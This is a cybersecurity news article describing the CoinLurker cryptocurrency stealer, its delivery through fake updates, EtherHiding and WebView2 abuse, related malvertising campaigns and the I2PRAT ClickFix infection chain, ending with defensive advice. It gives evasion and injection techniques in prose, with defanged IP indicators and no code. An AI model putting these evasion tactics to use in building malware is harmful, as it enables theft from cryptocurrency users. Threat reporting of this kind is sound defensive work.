Attackers are targeting cryptocurrency using fake software update notifications to deploy a sophisticated stealer malware known as CoinLurker. Written in Go and featuring advanced obfuscation and anti-analysis techniques, CoinLurker poses a severe threat in the current cybersecurity landscape.
Malware Delivery Tactics
Attackers use multiple deceptive entry points to trick users into downloading CoinLurker. These include:
Compromised Websites: Fake update prompts on hacked WordPress sites.
Malvertising Redirects: Ads leading to malicious sites.
Phishing Emails: Links to counterfeit update pages.
Social Engineering: Fake CAPTCHA verifications and download links shared via messaging apps.
Regardless of the entry method, the malware installation process exploits Microsoft Edge WebView2, enabling the payload’s execution while evading security detection.
Exploiting WebView2 for Evasion
WebView2’s reliance on pre-installed components and its need for user interaction complicates sandbox analysis. “Sandboxes often lack WebView2 or fail to replicate user actions, allowing the malware to evade automated detection,” explained Morphisec researcher Nadav Lorber.
Advanced Obfuscation with EtherHiding
A notable technique used in these campaigns is EtherHiding, where attackers inject scripts into compromised sites to access Web3 infrastructure. This infrastructure fetches the final payload from a Bitbucket repository masquerading as legitimate software (e.g., “UpdateMe.exe,” “SecurityPatch.exe”).
To increase legitimacy, these executables are signed with stolen Extended Validation (EV) certificates. A multi-layered injector then deploys the payload into the Microsoft Edge (“msedge.exe”) process, effectively bypassing typical security filters.
Technical Obfuscation Tactics
CoinLurker employs several obfuscation strategies to avoid detection:
In-Memory Decoding: Decodes the payload directly in memory during runtime.
Conditional Checks: Uses conditional logic to obscure the malware’s execution path.
Resource Assignments: Redundant tasks complicate analysis.
Iterative Memory Manipulation: Repeated memory changes hinder static analysis.
These techniques ensure the malware blends seamlessly into legitimate system processes, bypassing detection mechanisms reliant on behavioral analysis.
Data Harvesting Targets
Once operational, CoinLurker establishes a socket-based connection with a remote server and begins harvesting sensitive data, particularly targeting:
Cryptocurrency Wallets: Bitcoin, Ethereum, Ledger Live, and Exodus.
Communication Platforms: Telegram and Discord.
File Transfer Tools: FileZilla.
“Its ability to target both mainstream and lesser-known wallets highlights its adaptability and dangerous potential within the cryptocurrency ecosystem,” Lorber added.
Emerging Threats and Related Campaigns
CoinLurker’s rise coincides with other related malware operations. A notable example involves a single threat actor conducting up to 10 malvertising campaigns aimed at graphic design professionals using Google Search ads. The campaigns lure users with downloads of popular design tools like FreeCAD, Rhinoceros 3D, and Planner 5D.
Silent Push, a cybersecurity firm, identified two dedicated IP addresses—185.11.61[.]243 and 185.147.124[.]110—linked to these campaigns. “Domains are launched day after day, week after week, serving malicious downloads through Google Search ads,” Silent Push reported.
Another concerning development is the emergence of a malware family dubbed I2PRAT, also tracked by Cofense as I2Parcae RAT. I2PRAT leverages the I2P peer-to-peer network for encrypted communications with its command-and-control (C2) server, complicating efforts to track its activities.
Phishing Attack Chain
The I2PRAT infection chain starts with a phishing email containing a link. Clicking the link directs victims to a fake CAPTCHA verification page employing the ClickFix technique. This method tricks users into executing a Base64-encoded PowerShell command that downloads and launches the RAT from the C2 server over a TCP socket.
Actionable Enhancements for Better Protection
User Awareness Training: Conduct regular training on phishing, fake updates, and malvertising threats.
Web Security Filters: Deploy robust web filtering and threat detection tools.
Certificate Validation: Implement strict certificate validation checks to detect misuse.
Behavioral Analysis: Use endpoint detection and response (EDR) tools with strong behavioral analysis capabilities.
Secure Development Practices: Ensure web applications are protected against script injections.
By understanding and addressing the evolving tactics used by CoinLurker and similar threats, organizations can better defend against these advanced malware campaigns.
Follow us on 
(Twitter) for real time updates and exclusive content.
Interesting Article : Symlink Exploit in iOS and macOS Enables TCC Bypass